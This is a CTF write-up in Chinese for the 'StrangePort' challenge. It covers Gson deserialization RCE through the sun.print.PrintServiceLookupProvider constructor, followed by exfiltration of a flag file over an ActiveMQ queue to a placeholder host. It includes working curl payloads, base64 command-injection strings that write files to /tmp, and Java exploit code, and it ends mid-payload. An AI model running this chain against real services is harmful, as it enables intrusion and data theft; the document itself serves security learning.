StrangePort
考点:ApacheMQ、Gson反序列化
内网服务中起了一个apachemq+springboot项目,然后用nginx反代做一个不出网的处理。我们首先分析springboot服务。
只给了一个Api路由,目的很单纯就是Gson反序列化,那我们首先需要考虑如何Rce。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| import com.google.gson.Gson;
import sun.print.PrintServiceLookupProvider;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Objects;
public class GsonDemo {
public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
String Json="eyJscGNBbGxDb20iOlsidG91Y2ggL3RtcC9hYWFhYSIsInRvdWNoIC90bXAvYWFhYWEiXX0=";
String Person="Person";
Gson gson = new Gson();
Person o = (Person) gson.fromJson(new String(Base64.getDecoder().decode(Json), StandardCharsets.UTF_8), Class.forName(Person));
}
}
|
其中Json的base64随便给给,我们调试分析一下流程,理解一下Gson反序列化的特点
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| public class Person {
public Person() {
System.out.println(1111);
}
public String name = "john";
public String age = "11";
public String toString() {
return "Person{name='" + this.name + "', age='" + this.age + "'}";
}
public Person(String name, String age) {
this.name = name;
this.age = age;
}
Object writeReplace() {
System.out.println('1');
return 1;
}
public String getName() {
return this.name;
}
public void setName(String name) {
this.name = name;
}
public String getAge() {
return this.age;
}
public void setAge(String age) {
this.age = age;
}
}
|
当我们的反序列化对象有构造方法时,他会直接调用
假如没有构造方法,他就会进行unsafe实例化
那么知道这一个特性后我们就可以去思考一下怎么rce了,我们需要找到的调用链也就是constructor->Runtime.exec,当时打比赛的时候脑子没转过来,赛后才想起来Linux服务器下有很多UnixPrinter类,其中只要是一个方法基本都有命令拼贴,从而导致Rce,今天我们用到的类是PrintServiceLookupProvider,其实不是这个类也可以,实测实现了PrintServiceLookup的类都可以,他们的构造方法里都会新建一个while true的线程,不断的执行方法。
因此我们可以写一个小Demo方便我们去理解。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| import java.io.IOException;
public class Person {
public Person() throws IOException {
Runtime.getRuntime().exec("whoami"+age);
}
public String name = "john";
public String age = "11";
public String toString() {
return "Person{name='" + this.name + "', age='" + this.age + "'}";
}
public Person(String name, String age) {
this.name = name;
this.age = age;
}
public String getName() {
return this.name;
}
public void setName(String name) {
this.name = name;
}
public String getAge() {
return this.age;
}
public void setAge(String age) {
this.age = age;
}
}
|
这里person类的构造方法明显存在一个命令拼贴,我们传入payload{"name":"qwq",age:";touch /tmp/pwned"}
可以发现person的age属性还是默认的11,所以这里咱们单纯的放一个命令拼贴是不行的,之前提到的PrintService是会新建一个线程,进行一个重复循环如下。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| import java.io.IOException;
import java.io.Writer;
public class Person {
class RceThread implements Runnable{
@Override
public void run() {
while (true) {
try {
Runtime.getRuntime().exec(age);
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}
}
public Person() throws IOException {
Thread thr = new Thread(null, new Person.RceThread(),
"Rce", 0, false);
thr.setDaemon(true);
thr.start();
}
public String name = "john";
public String age = "11";
public String toString() {
return "Person{name='" + this.name + "', age='" + this.age + "'}";
}
public Person(String name, String age) {
this.name = name;
this.age = age;
}
public String getName() {
return this.name;
}
public void setName(String name) {
this.name = name;
}
public String getAge() {
return this.age;
}
public void setAge(String age) {
this.age = age;
}
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| import com.google.gson.Gson;
import sun.print.PrintServiceLookupProvider;
import javax.print.PrintServiceLookup;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Objects;
public class GsonDemo {
public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
String Json="eyJuYW1lIjoicXdxIixhZ2U6InRvdWNoIC90bXAvcHduZWQifQ==";
String Person="Person";
Gson gson = new Gson();
while (true) {
Person o = (Person) gson.fromJson(new String(Base64.getDecoder().decode(Json), StandardCharsets.UTF_8), Class.forName(Person));
}
}
}
|
rce成功了~
那我们现在回到题解,我们看看这个内部类的逻辑
经过调试会发现会执行方法
这里执行了execCmd,对外部类的属性进行了命令拼贴,所以一个简易的poc如下
{"lpcAllCom":["touch /tmp/aaaaa","touch /tmp/aaaaa"]}
1
| curl http://127.0.0.1:8877/api/sun.print.PrintServiceLookupProvider/eyJscGNBbGxDb20iOlsidG91Y2ggL3RtcC9hYWFhYSIsInRvdWNoIC90bXAvYWFhYWEiXX0=
|
成功执行了命令。说明poc成立,那我们继续往外看apachemq,apachemq最近出了个0day,可以利用Cpx类加载恶意xml导致rce,但是条件是出网,可是本题不出网,我们可以从RCE改为ssrf- -
可以参考
Apache ActiveMQ (版本 < 5.18.3) RCE 分析
X1roz师傅写的比较详细,也是很棒的一篇文章,太强了呀(有点佩服)
我们需要利用apachemq的队列知识给他外带出来。这里参考了一手nese战队的poc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| import org.apache.activemq.ActiveMQConnectionFactory;
import javax.jms.*;
public class Main implements MessageListener {
private void publish() throws Exception {
javax.jms.ConnectionFactory factory;
factory = new ActiveMQConnectionFactory("tcp://127.0.0.1:61616");
Connection connection = factory.createConnection();
Session pubSession = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
Queue queue = pubSession.createQueue("flagqueue");
MessageProducer publisher = pubSession.createProducer(queue);
String[] cmd = new String[]{"/bin/sh","-c","cat /flag"};
byte[] bs = new Scanner(new ProcessBuilder(cmd).start().getInputStream())
.useDelimiter("\\A")
.next()
.getBytes();
String message = new String(bs);
TextMessage msg = pubSession.createTextMessage();
msg.setText(message);
publisher.send(msg);
System.out.println("publish finished");
connection.close();
}
private void consume() throws Exception {
ConnectionFactory factory = new ActiveMQConnectionFactory("tcp://xxx:61616");
Connection connection = factory.createConnection();
Session subSession = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
Queue queue = subSession.createQueue("flagqueue");
MessageConsumer subscriber = subSession.createConsumer(queue);
subscriber.setMessageListener(this);
connection.start();
}
public static void main(String[] args) throws Exception {
Main main = new Main();
main.publish();
}
@Override
public void onMessage(Message message) {
try {
System.out.println("Received " + ((TextMessage) message).getText());
} catch (Exception e) {
e.printStackTrace();
}
}
}
|
我们首先需要将这个文件写入服务器的某个位置,然后编译运行。
1
| echo aW1wb3J0IG9yZy5hcGFjaGUuYWN0aXZlbXEuQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeTsKaW1wb3J0IGphdmF4Lmptcy4qOwoKcHVibGljIGNsYXNzIE1haW4gaW1wbGVtZW50cyBNZXNzYWdlTGlzdGVuZXIgewogICAgcHJpdmF0ZSB2b2lkIHB1Ymxpc2goKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBqYXZheC5qbXMuQ29ubmVjdGlvbkZhY3RvcnkgZmFjdG9yeTsKICAgICAgICBmYWN0b3J5ID0gbmV3IEFjdGl2ZU1RQ29ubmVjdGlvbkZhY3RvcnkoInRjcDovLzEyNy4wLjAuMTo2MTYxNiIpOwogICAgICAgIENvbm5lY3Rpb24gY29ubmVjdGlvbiA9IGZhY3RvcnkuY3JlYXRlQ29ubmVjdGlvbigpOwogICAgICAgIFNlc3Npb24gcHViU2Vzc2lvbiA9IGNvbm5lY3Rpb24uY3JlYXRlU2Vzc2lvbihmYWxzZSwgU2Vzc2lvbi5BVVRPX0FDS05PV0xFREdFKTsKICAgICAgICBRdWV1ZSBxdWV1ZSA9IHB1YlNlc3Npb24uY3JlYXRlUXVldWUoImZsYWdxdWV1ZSIpOwogICAgICAgIE1lc3NhZ2VQcm9kdWNlciBwdWJsaXNoZXIgPSBwdWJTZXNzaW9uLmNyZWF0ZVByb2R1Y2VyKHF1ZXVlKTsKICAgICAgICBTdHJpbmdbXSBjbWQgPSBuZXcgU3RyaW5nW117Ii9iaW4vc2giLCItYyIsImNhdCAvZmxhZyJ9OwogICAgICAgIGJ5dGVbXSBicyA9IG5ldyBTY2FubmVyKG5ldyBQcm9jZXNzQnVpbGRlcihjbWQpLnN0YXJ0KCkuZ2V0SW5wdXRTdHJlYW0oKSkKICAgICAgICAgICAgICAgIC51c2VEZWxpbWl0ZXIoIlxcQSIpCiAgICAgICAgICAgICAgICAubmV4dCgpCiAgICAgICAgICAgICAgICAuZ2V0Qnl0ZXMoKTsKICAgICAgICBTdHJpbmcgbWVzc2FnZSA9IG5ldyBTdHJpbmcoYnMpOwogICAgICAgIFRleHRNZXNzYWdlIG1zZyA9IHB1YlNlc3Npb24uY3JlYXRlVGV4dE1lc3NhZ2UoKTsKICAgICAgICBtc2cuc2V0VGV4dChtZXNzYWdlKTsKICAgICAgICBwdWJsaXNoZXIuc2VuZChtc2cpOwogICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigicHVibGlzaCBmaW5pc2hlZCIpOwogICAgICAgIGNvbm5lY3Rpb24uY2xvc2UoKTsKICAgIH0KCiAgICBwcml2YXRlIHZvaWQgY29uc3VtZSgpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIENvbm5lY3Rpb25GYWN0b3J5IGZhY3RvcnkgPSBuZXcgQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeSgidGNwOi8veHh4OjYxNjE2Iik7CiAgICAgICAgQ29ubmVjdGlvbiBjb25uZWN0aW9uID0gZmFjdG9yeS5jcmVhdGVDb25uZWN0aW9uKCk7CiAgICAgICAgU2Vzc2lvbiBzdWJTZXNzaW9uID0gY29ubmVjdGlvbi5jcmVhdGVTZXNzaW9uKGZhbHNlLCBTZXNzaW9uLkFVVE9fQUNLTk9XTEVER0UpOwogICAgICAgIFF1ZXVlIHF1ZXVlID0gc3ViU2Vzc2lvbi5jcmVhdGVRdWV1ZSgiZmxhZ3F1ZXVlIik7CiAgICAgICAgTWVzc2FnZUNvbnN1bWVyIHN1YnNjcmliZXIgPSBzdWJTZXNzaW9uLmNyZWF0ZUNvbnN1bWVyKHF1ZXVlKTsKICAgICAgICBzdWJzY3JpYmVyLnNldE1lc3NhZ2VMaXN0ZW5lcih0aGlzKTsKICAgICAgICBjb25uZWN0aW9uLnN0YXJ0KCk7CiAgICB9CgoKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBtYWluKFN0cmluZ1tdIGFyZ3MpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIE1haW4gbWFpbiA9IG5ldyBNYWluKCk7CiAgICAgICAgIG1haW4ucHVibGlzaCgpOwogICAgfQoKICAgIEBPdmVycmlkZQogICAgcHVibGljIHZvaWQgb25NZXNzYWdlKE1lc3NhZ2UgbWVzc2FnZSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigiUmVjZWl2ZWQgIiArICgoVGV4dE1lc3NhZ2UpIG1lc3NhZ2UpLmdldFRleHQoKSk7CiAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICB9CiAgICB9Cn0gICAK|base64 -d >/tmp/Main.class
|
构造的jwt如下
1
| {"lpcAllCom":["echo aW1wb3J0IG9yZy5hcGFjaGUuYWN0aXZlbXEuQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeTsKaW1wb3J0IGphdmF4Lmptcy4qOwoKcHVibGljIGNsYXNzIE1haW4gaW1wbGVtZW50cyBNZXNzYWdlTGlzdGVuZXIgewogICAgcHJpdmF0ZSB2b2lkIHB1Ymxpc2goKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBqYXZheC5qbXMuQ29ubmVjdGlvbkZhY3RvcnkgZmFjdG9yeTsKICAgICAgICBmYWN0b3J5ID0gbmV3IEFjdGl2ZU1RQ29ubmVjdGlvbkZhY3RvcnkoInRjcDovLzEyNy4wLjAuMTo2MTYxNiIpOwogICAgICAgIENvbm5lY3Rpb24gY29ubmVjdGlvbiA9IGZhY3RvcnkuY3JlYXRlQ29ubmVjdGlvbigpOwogICAgICAgIFNlc3Npb24gcHViU2Vzc2lvbiA9IGNvbm5lY3Rpb24uY3JlYXRlU2Vzc2lvbihmYWxzZSwgU2Vzc2lvbi5BVVRPX0FDS05PV0xFREdFKTsKICAgICAgICBRdWV1ZSBxdWV1ZSA9IHB1YlNlc3Npb24uY3JlYXRlUXVldWUoImZsYWdxdWV1ZSIpOwogICAgICAgIE1lc3NhZ2VQcm9kdWNlciBwdWJsaXNoZXIgPSBwdWJTZXNzaW9uLmNyZWF0ZVByb2R1Y2VyKHF1ZXVlKTsKICAgICAgICBTdHJpbmdbXSBjbWQgPSBuZXcgU3RyaW5nW117Ii9iaW4vc2giLCItYyIsImNhdCAvZmxhZyJ9OwogICAgICAgIGJ5dGVbXSBicyA9IG5ldyBTY2FubmVyKG5ldyBQcm9jZXNzQnVpbGRlcihjbWQpLnN0YXJ0KCkuZ2V0SW5wdXRTdHJlYW0oKSkKICAgICAgICAgICAgICAgIC51c2VEZWxpbWl0ZXIoIlxcQSIpCiAgICAgICAgICAgICAgICAubmV4dCgpCiAgICAgICAgICAgICAgICAuZ2V0Qnl0ZXMoKTsKICAgICAgICBTdHJpbmcgbWVzc2FnZSA9IG5ldyBTdHJpbmcoYnMpOwogICAgICAgIFRleHRNZXNzYWdlIG1zZyA9IHB1YlNlc3Npb24uY3JlYXRlVGV4dE1lc3NhZ2UoKTsKICAgICAgICBtc2cuc2V0VGV4dChtZXNzYWdlKTsKICAgICAgICBwdWJsaXNoZXIuc2VuZChtc2cpOwogICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigicHVibGlzaCBmaW5pc2hlZCIpOwogICAgICAgIGNvbm5lY3Rpb24uY2xvc2UoKTsKICAgIH0KCiAgICBwcml2YXRlIHZvaWQgY29uc3VtZSgpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIENvbm5lY3Rpb25GYWN0b3J5IGZhY3RvcnkgPSBuZXcgQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeSgidGNwOi8veHh4OjYxNjE2Iik7CiAgICAgICAgQ29ubmVjdGlvbiBjb25uZWN0aW9uID0gZmFjdG9yeS5jcmVhdGVDb25uZWN0aW9uKCk7CiAgICAgICAgU2Vzc2lvbiBzdWJTZXNzaW9uID0gY29ubmVjdGlvbi5jcmVhdGVTZXNzaW9uKGZhbHNlLCBTZXNzaW9uLkFVVE9fQUNLTk9XTEVER0UpOwogICAgICAgIFF1ZXVlIHF1ZXVlID0gc3ViU2Vzc2lvbi5jcmVhdGVRdWV1ZSgiZmxhZ3F1ZXVlIik7CiAgICAgICAgTWVzc2FnZUNvbnN1bWVyIHN1YnNjcmliZXIgPSBzdWJTZXNzaW9uLmNyZWF0ZUNvbnN1bWVyKHF1ZXVlKTsKICAgICAgICBzdWJzY3JpYmVyLnNldE1lc3NhZ2VMaXN0ZW5lcih0aGlzKTsKICAgICAgICBjb25uZWN0aW9uLnN0YXJ0KCk7CiAgICB9CgoKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBtYWluKFN0cmluZ1tdIGFyZ3MpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIE1haW4gbWFpbiA9IG5ldyBNYWluKCk7CiAgICAgICAgIG1haW4ucHVibGlzaCgpOwogICAgfQoKICAgIEBPdmVycmlkZQogICAgcHVibGljIHZvaWQgb25NZXNzYWdlKE1lc3NhZ2UgbWVzc2FnZSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigiUmVjZWl2ZWQgIiArICgoVGV4dE1lc3NhZ2UpIG1lc3NhZ2UpLmdldFRleHQoKSk7CiAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICB9CiAgICB9Cn0gICAK|base64 -d >/tmp/Main.class","echo aW1wb3J0IG9yZy5hcGFjaGUuYWN0aXZlbXEuQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeTsKaW1wb3J0IGphdmF4Lmptcy4qOwoKcHVibGljIGNsYXNzIE1haW4gaW1wbGVtZW50cyBNZXNzYWdlTGlzdGVuZXIgewogICAgcHJpdmF0ZSB2b2lkIHB1Ymxpc2goKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBqYXZheC5qbXMuQ29ubmVjdGlvbkZhY3RvcnkgZmFjdG9yeTsKICAgICAgICBmYWN0b3J5ID0gbmV3IEFjdGl2ZU1RQ29ubmVjdGlvbkZhY3RvcnkoInRjcDovLzEyNy4wLjAuMTo2MTYxNiIpOwogICAgICAgIENvbm5lY3Rpb24gY29ubmVjdGlvbiA9IGZhY3RvcnkuY3JlYXRlQ29ubmVjdGlvbigpOwogICAgICAgIFNlc3Npb24gcHViU2Vzc2lvbiA9IGNvbm5lY3Rpb24uY3JlYXRlU2Vzc2lvbihmYWxzZSwgU2Vzc2lvbi5BVVRPX0FDS05PV0xFREdFKTsKICAgICAgICBRdWV1ZSBxdWV1ZSA9IHB1YlNlc3Npb24uY3JlYXRlUXVldWUoImZsYWdxdWV1ZSIpOwogICAgICAgIE1lc3NhZ2VQcm9kdWNlciBwdWJsaXNoZXIgPSBwdWJTZXNzaW9uLmNyZWF0ZVByb2R1Y2VyKHF1ZXVlKTsKICAgICAgICBTdHJpbmdbXSBjbWQgPSBuZXcgU3RyaW5nW117Ii9iaW4vc2giLCItYyIsImNhdCAvZmxhZyJ9OwogICAgICAgIGJ5dGVbXSBicyA9IG5ldyBTY2FubmVyKG5ldyBQcm9jZXNzQnVpbGRlcihjbWQpLnN0YXJ0KCkuZ2V0SW5wdXRTdHJlYW0oKSkKICAgICAgICAgICAgICAgIC51c2VEZWxpbWl0ZXIoIlxcQSIpCiAgICAgICAgICAgICAgICAubmV4dCgpCiAgICAgICAgICAgICAgICAuZ2V0Qnl0ZXMoKTsKICAgICAgICBTdHJpbmcgbWVzc2FnZSA9IG5ldyBTdHJpbmcoYnMpOwogICAgICAgIFRleHRNZXNzYWdlIG1zZyA9IHB1YlNlc3Npb24uY3JlYXRlVGV4dE1lc3NhZ2UoKTsKICAgICAgICBtc2cuc2V0VGV4dChtZXNzYWdlKTsKICAgICAgICBwdWJsaXNoZXIuc2VuZChtc2cpOwogICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigicHVibGlzaCBmaW5pc2hlZCIpOwogICAgICAgIGNvbm5lY3Rpb24uY2xvc2UoKTsKICAgIH0KCiAgICBwcml2YXRlIHZvaWQgY29uc3VtZSgpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIENvbm5lY3Rpb25GYWN0b3J5IGZhY3RvcnkgPSBuZXcgQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeSgidGNwOi8veHh4OjYxNjE2Iik7CiAgICAgICAgQ29ubmVjdGlvbiBjb25uZWN0aW9uID0gZmFjdG9yeS5jcmVhdGVDb25uZWN0aW9uKCk7CiAgICAgICAgU2Vzc2lvbiBzdWJTZXNzaW9uID0gY29ubmVjdGlvbi5jcmVhdGVTZXNzaW9uKGZhbHNlLCBTZXNzaW9uLkFVVE9fQUNLTk9XTEVER0UpOwogICAgICAgIFF1ZXVlIHF1ZXVlID0gc3ViU2Vzc2lvbi5jcmVhdGVRdWV1ZSgiZmxhZ3F1ZXVlIik7CiAgICAgICAgTWVzc2FnZUNvbnN1bWVyIHN1YnNjcmliZXIgPSBzdWJTZXNzaW9uLmNyZWF0ZUNvbnN1bWVyKHF1ZXVlKTsKICAgICAgICBzdWJzY3JpYmVyLnNldE1lc3NhZ2VMaXN0ZW5lcih0aGlzKTsKICAgICAgICBjb25uZWN0aW9uLnN0YXJ0KCk7CiAgICB9CgoKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBtYWluKFN0cmluZ1tdIGFyZ3MpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIE1haW4gbWFpbiA9IG5ldyBNYWluKCk7CiAgICAgICAgIG1haW4ucHVibGlzaCgpOwogICAgfQoKICAgIEBPdmVycmlkZQogICAgcHVibGljIHZvaWQgb25NZXNzYWdlKE1lc3NhZ2UgbWVzc2FnZSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigiUmVjZWl2ZWQgIiArICgoVGV4dE1lc3NhZ2UpIG1lc3NhZ2UpLmdldFRleHQoKSk7CiAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICB9CiAgICB9Cn0gICAK|base64 -d >/tmp/Main.class"]}
|
1
| eyJscGNBbGxDb20iOlsiZWNobyBhVzF3YjNKMElHOXlaeTVoY0dGamFHVXVZV04wYVhabGJYRXVRV04wYVhabFRWRkRiMjV1WldOMGFXOXVSbUZqZEc5eWVUc0thVzF3YjNKMElHcGhkbUY0TG1wdGN5NHFPd29LY0hWaWJHbGpJR05zWVhOeklFMWhhVzRnYVcxd2JHVnRaVzUwY3lCTlpYTnpZV2RsVEdsemRHVnVaWElnZXdvZ0lDQWdjSEpwZG1GMFpTQjJiMmxrSUhCMVlteHBjMmdvS1NCMGFISnZkM01nUlhoalpYQjBhVzl1SUhzS0lDQWdJQ0FnSUNCcVlYWmhlQzVxYlhNdVEyOXVibVZqZEdsdmJrWmhZM1J2Y25rZ1ptRmpkRzl5ZVRzS0lDQWdJQ0FnSUNCbVlXTjBiM0o1SUQwZ2JtVjNJRUZqZEdsMlpVMVJRMjl1Ym1WamRHbHZia1poWTNSdmNua29JblJqY0Rvdkx6RXlOeTR3TGpBdU1UbzJNVFl4TmlJcE93b2dJQ0FnSUNBZ0lFTnZibTVsWTNScGIyNGdZMjl1Ym1WamRHbHZiaUE5SUdaaFkzUnZjbmt1WTNKbFlYUmxRMjl1Ym1WamRHbHZiaWdwT3dvZ0lDQWdJQ0FnSUZObGMzTnBiMjRnY0hWaVUyVnpjMmx2YmlBOUlHTnZibTVsWTNScGIyNHVZM0psWVhSbFUyVnpjMmx2YmlobVlXeHpaU3dnVTJWemMybHZiaTVCVlZSUFgwRkRTMDVQVjB4RlJFZEZLVHNLSUNBZ0lDQWdJQ0JSZFdWMVpTQnhkV1YxWlNBOUlIQjFZbE5sYzNOcGIyNHVZM0psWVhSbFVYVmxkV1VvSW1ac1lXZHhkV1YxWlNJcE93b2dJQ0FnSUNBZ0lFMWxjM05oWjJWUWNtOWtkV05sY2lCd2RXSnNhWE5vWlhJZ1BTQndkV0pUWlhOemFXOXVMbU55WldGMFpWQnliMlIxWTJWeUtIRjFaWFZsS1RzS0lDQWdJQ0FnSUNCVGRISnBibWRiWFNCamJXUWdQU0J1WlhjZ1UzUnlhVzVuVzExN0lpOWlhVzR2YzJnaUxDSXRZeUlzSW1OaGRDQXZabXhoWnlKOU93b2dJQ0FnSUNBZ0lHSjVkR1ZiWFNCaWN5QTlJRzVsZHlCVFkyRnVibVZ5S0c1bGR5QlFjbTlqWlhOelFuVnBiR1JsY2loamJXUXBMbk4wWVhKMEtDa3VaMlYwU1c1d2RYUlRkSEpsWVcwb0tTa0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDNTFjMlZFWld4cGJXbDBaWElvSWx4Y1FTSXBDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQXVibVY0ZENncENpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBdVoyVjBRbmwwWlhNb0tUc0tJQ0FnSUNBZ0lDQlRkSEpwYm1jZ2JXVnpjMkZuWlNBOUlHNWxkeUJUZEhKcGJtY29Zbk1wT3dvZ0lDQWdJQ0FnSUZSbGVIUk5aWE56WVdkbElHMXpaeUE5SUhCMVlsTmxjM05wYjI0dVkzSmxZWFJsVkdWNGRFMWxjM05oWjJVb0tUc0tJQ0FnSUNBZ0lDQnRjMmN1YzJWMFZHVjRkQ2h0WlhOellXZGxLVHNLSUNBZ0lDQWdJQ0J3ZFdKc2FYTm9aWEl1YzJWdVpDaHRjMmNwT3dvZ0lDQWdJQ0FnSUZONWMzUmxiUzV2ZFhRdWNISnBiblJzYmlnaWNIVmliR2x6YUNCbWFXNXBjMmhsWkNJcE93b2dJQ0FnSUNBZ0lHTnZibTVsWTNScGIyNHVZMnh2YzJVb0tUc0tJQ0FnSUgwS0NpQWdJQ0J3Y21sMllYUmxJSFp2YVdRZ1kyOXVjM1Z0WlNncElIUm9jbTkzY3lCRmVHTmxjSFJwYjI0Z2V3b2dJQ0FnSUNBZ0lFTnZibTVsWTNScGIyNUdZV04wYjNKNUlHWmhZM1J2Y25rZ1BTQnVaWGNnUVdOMGFYWmxUVkZEYjI1dVpXTjBhVzl1Um1GamRHOXllU2dpZEdOd09pOHZlSGg0T2pZeE5qRTJJaWs3Q2lBZ0lDQWdJQ0FnUTI5dWJtVmpkR2x2YmlCamIyNXVaV04wYVc5dUlEMGdabUZqZEc5eWVTNWpjbVZoZEdWRGIyNXVaV04wYVc5dUtDazdDaUFnSUNBZ0lDQWdVMlZ6YzJsdmJpQnpkV0pUWlhOemFXOXVJRDBnWTI5dWJtVmpkR2x2Ymk1amNtVmhkR1ZUWlhOemFXOXVLR1poYkhObExDQlRaWE56YVc5dUxrRlZWRTlmUVVOTFRrOVhURVZFUjBVcE93b2dJQ0FnSUNBZ0lGRjFaWFZsSUhGMVpYVmxJRDBnYzNWaVUyVnpjMmx2Ymk1amNtVmhkR1ZSZFdWMVpTZ2labXhoWjNGMVpYVmxJaWs3Q2lBZ0lDQWdJQ0FnVFdWemMyRm5aVU52Ym5OMWJXVnlJSE4xWW5OamNtbGlaWElnUFNCemRXSlRaWE56YVc5dUxtTnlaV0YwWlVOdmJuTjFiV1Z5S0hGMVpYVmxLVHNLSUNBZ0lDQWdJQ0J6ZFdKelkzSnBZbVZ5TG5ObGRFMWxjM05oWjJWTWFYTjBaVzVsY2loMGFHbHpLVHNLSUNBZ0lDQWdJQ0JqYjI1dVpXTjBhVzl1TG5OMFlYSjBLQ2s3Q2lBZ0lDQjlDZ29LSUNBZ0lIQjFZbXhwWXlCemRHRjBhV01nZG05cFpDQnRZV2x1S0ZOMGNtbHVaMXRkSUdGeVozTXBJSFJvY205M2N5QkZlR05sY0hScGIyNGdld29nSUNBZ0lDQWdJRTFoYVc0Z2JXRnBiaUE5SUc1bGR5Qk5ZV2x1S0NrN0NpQWdJQ0FnSUNBZ0lHMWhhVzR1Y0hWaWJHbHphQ2dwT3dvZ0lDQWdmUW9LSUNBZ0lFQlBkbVZ5Y21sa1pRb2dJQ0FnY0hWaWJHbGpJSFp2YVdRZ2IyNU5aWE56WVdkbEtFMWxjM05oWjJVZ2JXVnpjMkZuWlNrZ2V3b2dJQ0FnSUNBZ0lIUnllU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lGTjVjM1JsYlM1dmRYUXVjSEpwYm5Sc2JpZ2lVbVZqWldsMlpXUWdJaUFySUNnb1ZHVjRkRTFsYzNOaFoyVXBJRzFsYzNOaFoyVXBMbWRsZEZSbGVIUW9LU2s3Q2lBZ0lDQWdJQ0FnZlNCallYUmphQ0FvUlhoalpYQjBhVzl1SUdVcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnWlM1d2NtbHVkRk4wWVdOclZISmhZMlVvS1RzS0lDQWdJQ0FnSUNCOUNpQWdJQ0I5Q24wZ0lDQUt8YmFzZTY0IC1kID4vdG1wL01haW4uY2xhc3MiLCJlY2hvIGFXMXdiM0owSUc5eVp5NWhjR0ZqYUdVdVlXTjBhWFpsYlhFdVFXTjBhWFpsVFZGRGIyNXVaV04wYVc5dVJtRmpkRzl5ZVRzS2FXMXdiM0owSUdwaGRtRjRMbXB0Y3k0cU93b0tjSFZpYkdsaklHTnNZWE56SUUxaGFXNGdhVzF3YkdWdFpXNTBjeUJOWlhOellXZGxUR2x6ZEdWdVpYSWdld29nSUNBZ2NISnBkbUYwWlNCMmIybGtJSEIxWW14cGMyZ29LU0IwYUhKdmQzTWdSWGhqWlhCMGFXOXVJSHNLSUNBZ0lDQWdJQ0JxWVhaaGVDNXFiWE11UTI5dWJtVmpkR2x2YmtaaFkzUnZjbmtnWm1GamRHOXllVHNLSUNBZ0lDQWdJQ0JtWVdOMGIzSjVJRDBnYm1WM0lFRmpkR2wyWlUxUlEyOXVibVZqZEdsdmJrWmhZM1J2Y25rb0luUmpjRG92THpFeU55NHdMakF1TVRvMk1UWXhOaUlwT3dvZ0lDQWdJQ0FnSUVOdmJtNWxZM1JwYjI0Z1kyOXVibVZqZEdsdmJpQTlJR1poWTNSdmNua3VZM0psWVhSbFEyOXVibVZqZEdsdmJpZ3BPd29nSUNBZ0lDQWdJRk5sYzNOcGIyNGdjSFZpVTJWemMybHZiaUE5SUdOdmJtNWxZM1JwYjI0dVkzSmxZWFJsVTJWemMybHZiaWhtWVd4elpTd2dVMlZ6YzJsdmJpNUJWVlJQWDBGRFMwNVBWMHhGUkVkRktUc0tJQ0FnSUNBZ0lDQlJkV1YxWlNCeGRXVjFaU0E5SUhCMVlsTmxjM05wYjI0dVkzSmx